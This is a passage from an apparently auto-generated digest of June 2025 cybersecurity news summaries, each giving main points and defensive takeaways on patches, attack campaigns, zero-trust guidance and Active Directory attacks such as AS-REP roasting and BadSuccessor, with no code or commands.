Kali Linux 2025.2 released with 13 new tools, car hacking updates

Source: BleepingComputer

Author: Sergiu Gatlan

URL: https://www.bleepingcomputer.com/news/security/kali-linux-20252-released-with-13-new-tools-car-hacking-updates/

ONE SENTENCE SUMMARY: Kali Linux 2025.2 features a refreshed UI, expanded car hacking tools, new cybersecurity utilities, and enhanced Kali NetHunter support.

MAIN POINTS:

  1. Kali Linux 2025.2 released, adding 13 new cybersecurity tools.
  2. Car hacking toolkit renamed “CARsenal” with improved interface.
  3. New car hacking tools include hlcand, VIN Info, CaringCaribou, and ICSim.
  4. Kali Menu reorganized using MITRE ATT&CK framework for easier tool discovery.
  5. GNOME updated to version 48 with performance boosts and digital well-being tools.
  6. KDE Plasma 6.3 introduces better fractional scaling and improved CPU monitoring.
  7. Evince replaced by Papers app in GNOME for document viewing.
  8. Kali NetHunter adds wireless injection support on TicWatch Pro 3 smartwatch.
  9. NetHunter now runs Kali NetHunter KeX on Android Auto head units.
  10. New and updated NetHunter kernels available for Xiaomi, Realme, and Samsung devices.

TAKEAWAYS:

  1. Improved UI and menu structure make tool navigation easier for cybersecurity professionals.
  2. CARsenal toolkit offers comprehensive solutions for automotive security testing.
  3. GNOME and KDE updates deliver significant user experience and performance enhancements.
  4. Expanded Kali NetHunter capabilities broaden mobile and wearable penetration testing opportunities.
  5. Upgrading Kali Linux installations streamlined with clear instructions and commands.

NIST Outlines Real-World Zero-Trust Examples

Source: Dark Reading

Author: Fahmida Y. Rashid

URL: https://www.darkreading.com/endpoint-security/nist-outlines-real-world-zero-trust-examples

ONE SENTENCE SUMMARY: NIST’s new SP 1800-35 guidance provides practical examples and phased implementation strategies for organizations adopting end-to-end zero-trust architectures.

MAIN POINTS:

  1. NIST released SP 1800-35 guidance demonstrating real-world zero-trust architectures using commercial technologies.
  2. The guidance includes 19 practical example implementations developed over four years with 24 industry partners.
  3. SP 1800-35 builds upon NIST SP 800-207, moving from conceptual to practical ZTA implementation advice.
  4. Organizations must customize zero-trust deployments due to their unique network environments and security requirements.
  5. Zero-trust architectures continuously evaluate and verify access requests, removing implicit trust in users or devices.
  6. Implementing zero trust significantly reduces lateral movement and privilege escalation by malicious actors.
  7. NCCoE team installed, configured, and tested each example, providing troubleshooting assistance and best practices.
  8. Guidance aligns solutions with NIST Cybersecurity Framework and NIST SP 800-53 standards.
  9. Organizations should incrementally adopt foundational elements like identity management and multifactor authentication.
  10. Zero trust is an ongoing journey requiring continual adaptation to evolving threats, technologies, and organizational needs.

TAKEAWAYS:

  1. Leverage NIST’s practical examples to start customized zero-trust deployments.
  2. Begin ZTA implementation with a thorough inventory of existing organizational assets and capabilities.
  3. Formulate clear access policies based on least privilege and continuous verification principles.
  4. Incrementally implement ZTA components, starting with foundational security solutions.
  5. Continuously monitor and evolve zero-trust architectures to address changing threats and business requirements.

How to log and monitor PowerShell activity for suspicious scripts and commands

Source: How to log and monitor PowerShell activity for suspicious scripts and commands | CSO Online

Author: unknown

URL: https://www.csoonline.com/article/4006326/how-to-log-and-monitor-powershell-activity-for-suspicious-scripts-and-commands.html

ONE SENTENCE SUMMARY:

Attackers exploit consultants’ systems using legitimate tools and remote access methods, highlighting the need for enhanced workstation protection strategies.

MAIN POINTS:

  1. Consultants’ computers are attractive targets due to their access across multiple organizations.
  2. Recent attack involved installing Alpha Agent and updating Splashtop for remote access.
  3. Attackers employed legitimate tools and normal processes, avoiding antivirus detection.
  4. Entry point of the initial attack remains unknown.
  5. Adjust attack surface reduction rules to prevent common attack techniques.
  6. Enable PowerShell script logging via Group Policy or Intune for monitoring.
  7. Regularly review logs for suspicious scripts, encoding, and obfuscation techniques.
  8. Microsoft Defender for Cloud can detect suspicious PowerShell and script activities.
  9. Maintain awareness of authorized remote access tools and restrict unauthorized ones.
  10. Monitor consultant workstations closely to detect abnormal activities quickly.

TAKEAWAYS:

  1. Tighten security rules to block execution of potentially malicious scripts.
  2. Enable detailed PowerShell logging on all critical workstations.
  3. Regularly analyze logs for unusual activities or attempts to harvest credentials.
  4. Clearly document approved remote access tools and restrict unauthorized installations.
  5. Increase monitoring and alerts specifically on consultant machines accessing internal resources.

Hunting Deserialization Vulnerabilities With Claude

Source: TrustedSec

Author: James Williams

URL: https://trustedsec.com/blog/hunting-deserialization-vulnerabilities-with-claude

ONE SENTENCE SUMMARY: This post explores using Model Context Protocol (MCP) to identify zero-day vulnerabilities in .NET assemblies through disassembly techniques.

MAIN POINTS:

  1. Model Context Protocol (MCP) helps discover zero-day vulnerabilities in .NET assemblies.
  2. MCP setup involves preparing Claude for effective .NET assembly disassembly.
  3. Zero-day vulnerabilities are previously unknown security flaws in software.
  4. Analyzing .NET assemblies can reveal potential zero-day exploits.
  5. MCP aids in systematically uncovering security weaknesses in compiled code.
  6. Disassembling .NET assemblies provides insight into underlying software vulnerabilities.
  7. The MCP-driven approach streamlines vulnerability identification processes.
  8. Proper MCP setup ensures accurate and efficient .NET code analysis.
  9. Understanding .NET assembly structure is crucial for zero-day discovery.
  10. MCP enhances security assessments through comprehensive assembly analysis.

TAKEAWAYS:

  1. MCP is valuable for identifying previously unknown vulnerabilities in .NET software.
  2. Setting up MCP correctly is essential for effective disassembly and vulnerability detection.
  3. Detailed analysis of assemblies enables discovery of hidden security flaws.
  4. Familiarity with .NET assembly internals significantly improves zero-day research outcomes.
  5. Leveraging MCP streamlines and improves accuracy of security assessments.

GitLab patches high severity account takeover, missing auth issues

Source: BleepingComputer

Author: Sergiu Gatlan

URL: https://www.bleepingcomputer.com/news/security/gitlab-patches-high-severity-account-takeover-missing-auth-issues/

ONE SENTENCE SUMMARY:

GitLab urgently released patches for critical vulnerabilities allowing account takeover, malicious CI/CD job injections, and denial-of-service attacks.

MAIN POINTS:

  1. GitLab issued security updates for Community and Enterprise editions 18.0.2, 17.11.4, and 17.10.8.
  2. CVE-2025-4278 vulnerability allows attackers to hijack accounts through HTML injection.
  3. CVE-2025-5121 flaw permits malicious CI/CD job injection into future project pipelines.
  4. CVE-2025-2254 addresses a cross-site scripting vulnerability affecting legitimate user sessions.
  5. CVE-2025-0673 fixes a denial-of-service issue involving infinite redirect loops and memory exhaustion.
  6. GitLab.com and Dedicated customers already have the security patches applied.
  7. GitLab strongly urges immediate upgrades for all self-managed installations.
  8. Attackers exploiting CVE-2025-5121 require authenticated access to GitLab Ultimate licensed instances.
  9. Recent breaches affected Europcar Mobility Group and Pearson through compromised GitLab repositories.
  10. GitLab platform serves over 30 million users, including half of Fortune 100 companies.

TAKEAWAYS:

  1. Immediately upgrade self-managed GitLab instances to patched versions.
  2. Ensure strict authentication and access controls, especially for GitLab Ultimate environments.
  3. Recognize the high-value target GitLab represents due to sensitive information in repositories.
  4. Regularly monitor GitLab security advisories to respond swiftly to emerging threats.
  5. Automate patching processes to streamline security updates and reduce administrative overhead.

Over 80,000 Microsoft Entra ID Accounts Targeted Using Open-Source TeamFiltration Tool

Source: The Hacker News

Author: info@thehackernews.com (The Hacker News)

URL: https://thehackernews.com/2025/06/over-80000-microsoft-entra-id-accounts.html

ONE SENTENCE SUMMARY: Attackers exploit TeamFiltration to target Microsoft Entra ID accounts, compromising over 80,000 users via password spraying and enumeration methods.

MAIN POINTS:

  1. New ATO campaign named UNK_SneakyStrike targets Microsoft Entra ID user accounts.
  2. Attackers leveraged open-source framework TeamFiltration, originally for penetration testing.
  3. Over 80,000 user accounts breached across numerous cloud tenants since December 2024.
  4. Microsoft Teams API and AWS servers were utilized to perform attacks.
  5. Primary attack methods include password spraying, user enumeration, and data exfiltration.
  6. Malicious files were uploaded to victims’ Microsoft OneDrive accounts for persistent access.
  7. Attack waves originated from geographically dispersed AWS servers to evade detection.
  8. Top attacking regions were United States (42%), Ireland (11%), and Great Britain (8%).
  9. Attacks occurred in concentrated bursts followed by quiet periods of four to five days.
  10. Smaller cloud tenants experienced broad targeting, while larger tenants had selective targeting.

TAKEAWAYS:

  1. Security tools intended for protection can be weaponized by attackers.
  2. Organizations must monitor for abnormal login attempts and geographic patterns.
  3. Regularly review and tighten user account access and permissions in cloud environments.
  4. Implement proactive defenses such as multi-factor authentication to counteract password spraying.
  5. Remain vigilant about publicly available security frameworks being misused by threat actors.

Microsoft Outlook to block more risky attachments used in attacks

Source: BleepingComputer

Author: Sergiu Gatlan

URL: https://www.bleepingcomputer.com/news/security/microsoft-outlook-to-block-more-risky-attachments-used-in-attacks/

ONE SENTENCE SUMMARY: Microsoft will block .library-ms and .search-ms attachments in Outlook starting July 2025 to counter phishing and malware threats.

MAIN POINTS:

  1. Microsoft expands Outlook’s blocked attachment list to include .library-ms and .search-ms files.
  2. The update applies to Outlook Web and the new Outlook for Windows starting July 2025.
  3. Attackers previously exploited .library-ms files in phishing campaigns targeting governments and companies.
  4. .search-ms protocol handler was exploited since June 2022 for phishing and malware delivery.
  5. Most organizations will not be affected due to rarity of these file types’ usage.
  6. Organizations relying on these file types must manually adjust allowed file type settings.
  7. Microsoft provides documentation to help Exchange Server administrators manage attachment security.
  8. Blocking these files is part of Microsoft’s larger strategy to eliminate exploited features.
  9. Microsoft previously disabled Office VBA macros, XLM macros, XLL add-ins, and ActiveX controls.
  10. VBScript support will also be discontinued by Microsoft starting April 2025.

TAKEAWAYS:

  1. Outlook security updates proactively block file types historically exploited by attackers.
  2. Organizations should review attachment policies to ensure operational continuity.
  3. Microsoft continues to remove legacy features to reduce security risks.
  4. Administrators can manually configure allowed file types to accommodate business requirements.
  5. Regularly reviewing Microsoft’s security documentation can help organizations stay informed and prepared.

Patch Tuesday – June 2025

Source: Rapid7 Cybersecurity Blog

Author: Adam Barnett

URL: https://www.rapid7.com/blog/post/2025/06/10/patch-tuesday-june-2025/

ONE SENTENCE SUMMARY:

Microsoft’s June 2025 Patch Tuesday addresses 67 vulnerabilities, including two notable zero-days and eight critical remote code execution flaws.

MAIN POINTS:

  1. Microsoft released patches for 67 vulnerabilities in June 2025 Patch Tuesday update.
  2. Only one vulnerability, CVE-2025-33053 (WebDAV RCE), is actively exploited in-the-wild.
  3. WebDAV vulnerability exploited by threat actor Stealth Falcon targeting Middle Eastern governments.
  4. Windows WebDAV implementation has been deprecated since November 2023, reducing default exposure risk.
  5. CVE-2025-33073 in Windows SMB Client is a publicly disclosed elevation of privilege vulnerability.
  6. Critical RCE vulnerability CVE-2025-33071 affects Windows KDC Proxy Service with exploitation considered likely.
  7. Three Office vulnerabilities (CVE-2025-47162, CVE-2025-47164, CVE-2025-47167) leverage Preview Pane for exploitation.
  8. Microsoft 365 Apps for Enterprise patches for critical Office vulnerabilities not yet available.
  9. Eight critical remote code execution vulnerabilities were disclosed, requiring immediate attention.
  10. Two browser vulnerabilities previously published separately are not included in the June 2025 totals.

TAKEAWAYS:

  1. Prioritize patching actively exploited WebDAV vulnerability CVE-2025-33053 immediately.
  2. Urgently address critical Windows KDC Proxy vulnerability CVE-2025-33071 on exposed servers.
  3. Monitor closely the SMB Client vulnerability CVE-2025-33073 due to public disclosure and potential exploitation.
  4. Understand Office Preview Pane vulnerabilities significantly increase exploitation risk.
  5. Keep aware of the delayed availability of patches for Microsoft 365 Apps for Enterprise.

How to use on-demand rotation for AWS KMS imported keys

Source: AWS Security Blog

Author: Jeremy Stieglitz

URL: https://aws.amazon.com/blogs/security/how-to-use-on-demand-rotation-for-aws-kms-imported-keys/

ONE SENTENCE SUMMARY:

AWS KMS now supports on-demand rotation of imported symmetric encryption key material, enabling compliance without changing key identifiers.

MAIN POINTS:

  1. AWS KMS introduces on-demand rotation for imported symmetric encryption key material (EXTERNAL origin).
  2. Previously, rotation required creating new keys and updating references; now identifiers remain constant.
  3. Imported keys can hold multiple key materials, rotating to the latest imported material on-demand.
  4. Ciphertext includes a key material identifier for automatic selection during decryption.
  5. API responses now include KeyMaterialId and CurrentKeyMaterialId for greater rotation transparency.
  6. Rotation process involves importing new key material, setting rotation state, and initiating rotation.
  7. AWS CLI and SDKs support on-demand key rotation, with new parameters for import-type.
  8. Imported keys uniquely offer immediate expiry and deletion capabilities for enhanced control.
  9. CloudTrail logging includes key material ID for improved auditability and compliance.
  10. Pricing is simplified with a base cost and capped additional rotation charges after two rotations.

TAKEAWAYS:

  1. Simplifies compliance and security audits through seamless, non-disruptive key rotation.
  2. Enhances transparency and auditability with new API response fields and detailed CloudTrail logs.
  3. Provides greater flexibility and control with immediate expiry and deletion of imported key material.
  4. Reduces operational overhead by maintaining unchanged key identifiers during rotation.
  5. Offers predictable costs by capping additional charges beyond the second rotation per month.

Critical Cisco ISE Auth Bypass Flaw Impacts Cloud Deployments on AWS, Azure, and OCI

Source: The Hacker News

Author: info@thehackernews.com (The Hacker News)

URL: https://thehackernews.com/2025/06/critical-cisco-ise-auth-bypass-flaw.html

ONE SENTENCE SUMMARY: Cisco issued critical patches addressing a static credential vulnerability in cloud-based Identity Services Engine deployments, allowing unauthorized access.

MAIN POINTS:

  1. Cisco released patches for critical vulnerability CVE-2025-20286 in Identity Services Engine (ISE).
  2. The flaw has a critical CVSS severity rating of 9.9 out of 10.
  3. Issue stems from improperly generated static credentials in cloud deployments.
  4. Affected platforms include AWS, Microsoft Azure, and Oracle Cloud Infrastructure (OCI).
  5. Exploitation allows attackers access to sensitive data and limited administrative tasks.
  6. Vulnerability affects cloud-based Primary Administration nodes only; on-premises nodes are safe.
  7. Credentials are identical across deployments of same Cisco ISE release and cloud platform.
  8. Exploit could allow attacker to disrupt services or change system configurations.
  9. Proof-of-concept exploit exists, but no evidence of malicious exploitation yet.
  10. Cisco recommends restricting administrator traffic or performing a factory reset as mitigation.

TAKEAWAYS:

  1. Immediately apply Cisco’s security patches to affected cloud deployments.
  2. Restrict administrative access to trusted sources to mitigate potential exploits.
  3. Consider resetting Cisco ISE passwords using provided command, despite configuration reset risks.
  4. Regularly monitor for unusual activity, given the availability of proof-of-concept exploit.
  5. Evaluate and plan migration strategies to unaffected software versions or on-premises nodes.

1.1 Identity Governance in a Zero-Trust World

Source: Medium

Author: James Booth

URL: https://jmspbooth.medium.com/1-1-identity-governance-in-a-zero-trust-world-1ca5b58c4b8c

ONE SENTENCE SUMMARY: Identity governance operationalizes Zero Trust security by continuously managing user access, entitlements, and lifecycle events through automated, policy-driven controls.

MAIN POINTS:

  1. Most breaches occur due to unmanaged identities, orphaned accounts, and excess permissions.
  2. Zero Trust requires continuous verification of identity and entitlements in real-time.
  3. Identity governance ensures accurate user verification through robust identity proofing methods.
  4. Centralized directories with policy-as-code enforce consistent access controls across all systems.
  5. Decentralized identity (DIDs) enhances trust through cryptographically verified credentials.
  6. Automated lifecycle management rapidly revokes permissions when users change roles or leave.
  7. Non-human identities (bots, containers) require similar rigorous lifecycle governance controls.
  8. Conditional access dynamically evaluates real-time risk signals to adjust access levels immediately.
  9. Governance-as-code provides auditable, immutable records of entitlement changes and compliance.
  10. Effective identity governance significantly reduces breach probability and audit overhead costs.

TAKEAWAYS:

  1. Implement identity proofing and high-assurance authentication to enhance trust in user identities.
  2. Leverage centralized, policy-as-code IAM systems for consistent and secure access management.
  3. Adopt automated processes for join-move-leave events to mitigate risks from orphaned accounts.
  4. Include non-human identities in governance frameworks to address all possible security threats.
  5. Use decentralized identity and conditional access to build resilience against single points of failure.

msdirtbag/MDEAutomator: PowerShell-based Automation of Defender for Endpoint

Source: GitHub

Author: unknown

URL: https://github.com/msdirtbag/MDEAutomator

ONE SENTENCE SUMMARY:

MDEAutomator is a modular, serverless Azure Function and PowerShell-based solution streamlining endpoint management, incident response, threat hunting, and custom detection synchronization for Microsoft Defender for Endpoint (MDE).

MAIN POINTS:

  1. Provides bulk automation of response actions, live response commands, and threat indicator management.
  2. Utilizes Azure Functions (Dispatcher, Orchestrator, Profiles, TIManager, AutoHunt, CDManager) for endpoint orchestration.
  3. Supports multi-tenant operations using User Managed Identity and App Registration federation.
  4. Enables bulk threat hunting using KQL queries via Microsoft Graph API, exporting results to Azure Storage.
  5. Allows bulk synchronization of Custom Detections with Azure Storage, including backup capabilities.
  6. Offers convenient uploading/downloading of files and scripts to/from endpoints and Azure Storage.
  7. Implements Python/Flask-based GUI hosted in Azure App Service with Entra ID authentication.
  8. Provides cmdlets for essential operations such as device isolation, application execution restriction, and forensic package collection.
  9. Supports advanced security practices including signed PowerShell scripts via Azure Trusted Signing.
  10. Has an estimated monthly Azure cost of approximately $210 USD.

TAKEAWAYS:

  1. MDEAutomator significantly enhances Defender endpoint management through serverless automation and orchestration.
  2. Customizable PowerShell modules simplify complex MDE tasks like live response and threat indicator management.
  3. Multi-tenant readiness and federated identity options support scalable deployments.
  4. Advanced security measures like signed scripts and App Service authentication are strongly recommended.
  5. Comprehensive automation of custom detections and threat hunting greatly improves operational efficiency.

Kerberos AS-REP roasting attacks: What you need to know

Source: BleepingComputer

Author: Sponsored by Specops Software

URL: https://www.bleepingcomputer.com/news/security/kerberos-as-rep-roasting-attacks-what-you-need-to-know/

ONE SENTENCE SUMMARY: AS-REP Roasting attacks exploit Active Directory accounts without Kerberos pre-authentication, highlighting the critical importance of enforcing strong, secure passwords.

MAIN POINTS:

  1. AS-REP Roasting targets Active Directory user accounts lacking Kerberos pre-authentication.
  2. Normally, Kerberos pre-authentication securely transmits timestamps encrypted with user password hashes.
  3. Attackers exploit disabled pre-authentication, capturing AS-REP responses containing Ticket Granting Tickets (TGT).
  4. Criminals extract passwords from TGTs offline, often using brute-force techniques.
  5. Tools like Rubeus or Impacket facilitate AS-REP Roasting attacks.
  6. Cybersecurity agencies identify AS-REP Roasting among top Active Directory threats.
  7. Verizon reports stolen credentials involved in nearly half of data breaches.
  8. Organizations must identify vulnerable accounts using specialized detection scripts.
  9. Monitoring specific Windows Event IDs (4625, 4768, 4738, 5136) can detect ongoing attacks.
  10. Strong, uncompromised passwords and strict password policies significantly mitigate AS-REP Roasting risks.

TAKEAWAYS:

  1. Enforce Kerberos pre-authentication on Active Directory accounts to prevent AS-REP Roasting.
  2. Monitor and log key Windows security events to detect malicious activity promptly.
  3. Limit privileges and isolate accounts that must bypass Kerberos pre-authentication.
  4. Implement robust, compliant password policies to protect accounts against brute-force attacks.
  5. Regularly audit passwords against breached databases to maintain security and compliance.

Rapid7 Q1 2025 Incident Response Findings

Source: Rapid7 Cybersecurity Blog

Author: Chris Boyd

URL: https://www.rapid7.com/blog/post/2025/06/04/rapid7-q1-2025-incident-response-findings/

ONE SENTENCE SUMMARY:

Rapid7’s Q1 2025 report highlights stolen credentials without MFA as the top initial access vector, widespread BunnyLoader malware, and targeted ransomware attacks primarily affecting manufacturing.

MAIN POINTS:

  1. Stolen credentials without MFA remain the leading initial access vector, causing 56% of incidents.
  2. Exposed RDP services were the initial access vector in 6% but exploited further in 44% of incidents.
  3. Vulnerability CVE-2024-55591 in Fortinet appliances widely exploited, enabling attacker control and data exfiltration.
  4. Exploited SimpleHelp RMM vulnerabilities (CVE-2024-57726/57727/57728) facilitated ransomware deployment.
  5. SEO poisoning via sponsored search ads led directly to malware downloads and ransomware attacks.
  6. BunnyLoader malware observed in 40% of incidents, prevalent across nearly all industries.
  7. Fake CAPTCHA attacks accounted for half of BunnyLoader malware deployments.
  8. Manufacturing was the most targeted industry, involved in over 24% of incidents.
  9. Qilin ransomware group actively targeted healthcare, manufacturing, financial sectors through double-extortion attacks.
  10. Attackers frequently disabled security tools and backups to prevent recovery post-compromise.

TAKEAWAYS:

  1. Implementing MFA remains critical, as attackers consistently exploit unprotected valid credentials.
  2. Organizations must secure exposed RDP and RMM tooling to prevent ransomware infections.
  3. Be cautious of sponsored search results to avoid SEO poisoning and malware downloads.
  4. Strengthen defenses against BunnyLoader malware, particularly fake CAPTCHA and compromised sites.
  5. Manufacturing organizations should prioritize securing legacy systems and complex supply chains.

The Role of Telemetry in Cloud Security: Unlocking the Secrets of the Cloud 

Source: Varonis Blog

Author: Daniel Miller

URL: https://www.varonis.com/blog/cloud-telemetry

ONE SENTENCE SUMMARY:

Telemetry enables proactive cloud security by analyzing real-time data to detect anomalies, strengthen defenses, and respond swiftly to threats.

MAIN POINTS:

  1. Telemetry collects real-time data to monitor cloud environments and detect security threats proactively.
  2. AWS CloudTrail logs API calls, aiding in auditing, compliance, and detecting unauthorized access.
  3. Azure Monitor analyzes telemetry data, integrating with Azure Security Center for enhanced threat detection.
  4. Google Cloud Audit Logs track resource actions to detect suspicious activities and ensure policy compliance.
  5. Telemetry helps identify unusual patterns, like spikes in API calls signaling potential breaches.
  6. Detailed telemetry records support auditing and demonstrate compliance with regulatory requirements.
  7. Continuous telemetry monitoring improves security posture by addressing vulnerabilities in real-time.
  8. Automation of telemetry monitoring ensures prompt detection and response to threats.
  9. Integrating telemetry data with SIEM enhances comprehensive threat detection and security visibility.
  10. Challenges like data volume, quality, and integration complexity require effective data management strategies.

TAKEAWAYS:

  1. Utilize cloud provider tools (AWS CloudTrail, Azure Monitor, GC Audit Logs) for robust telemetry.
  2. Continuously monitor telemetry data to proactively detect and respond to threats.
  3. Integrate telemetry solutions with SIEM systems for comprehensive security insights.
  4. Automate telemetry monitoring processes to improve efficiency and threat response speed.
  5. Address telemetry challenges with efficient data management, validation, and standardized integration practices.

Threat Hunting C2 over HTTPS Connections Using the TLS Certificate

Source: Active Countermeasures

Author: Faan Rossouw

URL: https://www.activecountermeasures.com/threat-hunting-c2-over-https-connections-using-the-tls-certificate/

ONE SENTENCE SUMMARY: The article discusses techniques for threat hunting command and control (C2) activity hidden within HTTPS connections using TLS certificates.

MAIN POINTS:

  1. Threat actors often hide C2 traffic within encrypted HTTPS connections.
  2. TLS certificates can provide valuable indicators for detecting malicious activities.
  3. Legitimate certificates are sometimes misused by attackers for C2 communications.
  4. Anomalies in TLS certificate metadata help identify suspicious HTTPS connections.
  5. Certificate attributes like issuer, validity period, and domain can indicate malicious usage.
  6. Automated tools can analyze TLS certificates efficiently to detect threats.
  7. Inspecting certificates is essential for effective threat hunting practices.
  8. TLS certificate fingerprinting helps identify known malicious infrastructure.
  9. Monitoring certificate issuance patterns can uncover malicious actors’ infrastructure.
  10. Properly implemented TLS certificate inspection enhances cybersecurity posture.

TAKEAWAYS:

  1. Leverage TLS certificate metadata analysis to detect hidden C2 channels.
  2. Pay attention to unusual certificate attributes to identify potential threats.
  3. Integrate certificate inspection into existing threat hunting methodologies.
  4. Automate TLS certificate monitoring to efficiently spot anomalies.
  5. Maintain updated threat intelligence on TLS certificate misuse for effective detection.

You Don’t Need a Red Team

Source: Dark Reading

Author: unknown

URL: https://www.darkreading.com/cyber-risk/you-dont-need-red-team

ONE SENTENCE SUMMARY: Attack path mapping, a collaborative and cost-effective offensive security methodology, offers broader coverage and better educates teams compared to traditional red-team exercises.

MAIN POINTS:

  1. Most red-team exercise requests are redirected due to client readiness, budget, or understanding issues.
  2. Attack path mapping involves collaboration between offensive operators and internal security SMEs.
  3. Traditional red-team tests identify only the simplest paths rather than providing comprehensive coverage.
  4. Attack path mapping starts by defining critical business objectives and potential attacker entry points.
  5. Working transparently with internal experts accelerates reconnaissance and better maps attack paths.
  6. Cloud-native environments demand collaborative testing due to advanced identity management protections.
  7. Realistic scenarios such as compromised DevOps roles offer better insights into actual security risks.
  8. Purple teams, while beneficial, often sacrifice realism by overly focusing on endpoint security tests.
  9. Automated purple team exercises effectively assess detection capabilities but overlook deeper threats.
  10. The suggested collaborative methodology provides more comprehensive insights and better overall value.

TAKEAWAYS:

  1. Collaborative methodologies provide broader security coverage than traditional stealth-based red teams.
  2. Engaging internal experts significantly accelerates offensive security assessments and enriches outcomes.
  3. Realistic attacker scenarios better address genuine security threats than standard isolated test cases.
  4. Cloud security assessments benefit significantly from granting testers higher visibility and realistic privileges.
  5. Carefully evaluate whether a traditional red-team exercise truly meets your organization’s security needs.

The hidden gaps in your asset inventory, and how to close them

Source: Help Net Security

Author: Mirko Zorz

URL: https://www.helpnetsecurity.com/2025/05/22/tim-grieveson-thingsrecon-asset-inventory-gaps/

ONE SENTENCE SUMMARY: Tim Grieveson emphasizes ongoing automated asset discovery, cross-functional collaboration, addressing overlooked blind spots, and context-driven risk prioritization.

MAIN POINTS:

  1. Asset inventory should be ongoing, automated, and integrated with business context, not a one-time project.
  2. Communicating inventory issues openly with stakeholders is crucial for managing associated risks.
  3. Leveraging existing endpoint agents, cloud providers, DNS records, and procurement systems enhances initial visibility.
  4. Implementing dedicated continuous discovery tools significantly improves security visibility and asset context.
  5. Clearly defining inventory scope and categorizing assets prevents critical elements from being overlooked.
  6. Asset inventory requires collaboration across security, IT operations, development, network, and business teams.
  7. Biggest blind spot is relying solely on documentation without validating actual live assets.
  8. Commonly overlooked assets include subdomains, public APIs, third-party integrations, and misconfigured DNS services.
  9. Asset discovery must integrate closely with vulnerability management, threat detection, and CMDB systems.
  10. Contextual information (exposure, business-criticality, usage) is essential for accurate asset risk prioritization.

TAKEAWAYS:

  1. Shift asset inventory mindset from periodic audits to continuous, automated discovery.
  2. Build cross-functional teams to maintain comprehensive asset visibility across organizational silos.
  3. Regularly validate documented assets against actual infrastructure to prevent blind spots.
  4. Expand discovery to external, third-party, and edge assets beyond traditional network boundaries.
  5. Prioritize risk based on asset exposure, criticality, and business context rather than just severity scores.

The Hidden Cybersecurity Risks of M&A

Source: Dark Reading

Author: Denny LeCompte

URL: https://www.darkreading.com/cyber-risk/hidden-cybersecurity-risks-mergers-acquisitions

ONE SENTENCE SUMMARY:

Ignoring cybersecurity during mergers and acquisitions exposes businesses to hidden vulnerabilities, compliance issues, and costly security breaches post-acquisition.

MAIN POINTS:

  1. Mergers involve inheriting digital footprints including endpoints, credentials, and hidden security vulnerabilities.
  2. Cybersecurity is frequently neglected in due diligence, creating substantial risk post-acquisition.
  3. IT integration chaos often leads to insufficient access control and outdated credential management.
  4. Legacy systems from acquired companies pose significant cybersecurity threats if not assessed.
  5. Employees are vulnerable to phishing scams during transitions, increasing insider threat risks.
  6. Inadequate cybersecurity training can result in sensitive data leaks and breaches post-merger.
  7. Regulatory and compliance mismatches between companies can create serious legal and financial liabilities.
  8. Comprehensive cybersecurity audits must evaluate identities, compliance histories, and past breaches.
  9. Companies should promptly standardize security policies and adopt modern, cloud-native security solutions.
  10. Proactive cybersecurity integration during mergers is essential to protect reputation, trust, and financial value.

TAKEAWAYS:

  1. Prioritize cybersecurity due diligence alongside financial and operational assessments.
  2. Enforce strict access control policies and revoke outdated credentials immediately post-acquisition.
  3. Conduct thorough audits of legacy IT systems and address incompatibilities proactively.
  4. Implement cybersecurity awareness and anti-phishing training programs early in the merger process.
  5. Align quickly with the strictest compliance standards from both companies to mitigate regulatory risks.

BadSuccessor: Unpatched Microsoft Active Directory attack enables domain takeover

Source: BadSuccessor: Unpatched Microsoft Active Directory attack enables domain takeover | CSO Online

Author: unknown

URL: https://www.csoonline.com/article/3992456/badsuccessor-unpatched-microsoft-active-directory-attack-enables-domain-takeover.html

ONE SENTENCE SUMMARY:

Researchers discovered a critical vulnerability named “BadSuccessor” in Windows Server 2025 Active Directory allowing attackers full domain compromise without needing privileged accounts.

MAIN POINTS:

  1. Researchers identified “BadSuccessor,” a new vulnerability in Windows Server 2025 Active Directory.
  2. The flaw exploits Delegated Managed Service Accounts (dMSA), intended to mitigate Kerberoasting attacks.
  3. Attackers can impersonate any user, including domain administrators, through manipulated dMSA account attributes.
  4. Microsoft rated the issue moderately severe, not immediately urgent, despite researchers’ strong disagreement.
  5. dMSA accounts inherit permissions of superseded service accounts through migration processes lacking proper validation.
  6. Key Distribution Center (KDC) mistakenly grants privileges based solely on easily manipulated account attributes.
  7. Attackers can exploit CreateChild permissions on Organizational Units (OUs) to create malicious dMSA accounts.
  8. Unprivileged users can arbitrarily set attributes to falsely indicate completed migrations, gaining unauthorized privileges.
  9. Attackers can extract encrypted passwords included in the KERB-DMSA-KEYPACKAGE structure of session tickets.
  10. Akamai released a PowerShell script and monitoring guidelines for organizations until Microsoft provides an official patch.

TAKEAWAYS:

  1. Immediately restrict CreateChild permissions to trusted administrators.
  2. Use Akamai’s provided PowerShell script to audit current AD environments for vulnerable permissions.
  3. Implement recommended SACLs to log suspicious dMSA creations and attribute modifications.
  4. Regularly monitor for unusual TGTs containing KERB-DMSA-KEYPACKAGE structures.
  5. Advocate for urgent internal review of AD permissions despite Microsoft’s moderate severity rating.

Getting started with Conditional Access: Comparing Entra ID Conditional Access with Cisco Duo Security

Source: The Red Canary Blog: Information Security Insights

Author: Sam Straka

URL: https://redcanary.com/blog/security-operations/conditional-access-cisco-duo/

ONE SENTENCE SUMMARY:

This blog compares Microsoft’s Entra ID Conditional Access and Cisco’s Duo Adaptive Access Policies, highlighting their similarities, differences, and integration possibilities.

MAIN POINTS:

  1. Duo primarily provides MFA layered over existing identity solutions, unlike full IAM platforms like Microsoft.
  2. Duo policies can be globally applied or targeted per application/user group, similar to Entra ID.
  3. Duo enforces MFA by default, with conditional bypass options for trusted scenarios.
  4. Device compliance checks in Duo use certificates or health apps, comparable to Entra ID Intune integration.
  5. Duo’s user interface for granular device policy rules is user-friendly and intuitive.
  6. Duo offers geolocation and trusted network conditions similar to Entra ID’s named locations.
  7. Duo introduced Risk-Based Authentication (RBA) in 2023, focusing on anomalies during MFA steps.
  8. Duo doesn’t directly block legacy authentication, relying instead on primary authentication systems.
  9. Duo excels at enforcing device health and compliance checks for sensitive resource access.
  10. Duo integrates as a third-party MFA provider with Entra ID Conditional Access via custom controls.

TAKEAWAYS:

  1. Duo is ideal for organizations looking primarily for strong MFA and device health checks.
  2. Microsoft Entra ID offers deeper integration with device management and broader risk evaluation signals.
  3. Duo’s RBA effectively addresses MFA fatigue and anomalous sign-in behaviors.
  4. Combining Duo with Entra ID provides comprehensive conditional access coverage but introduces complexity.
  5. Advanced conditional access features in both solutions require higher-tier licensing plans.

AWS Default IAM Roles Found to Enable Lateral Movement and Cross-Service Exploitation

Source: The Hacker News

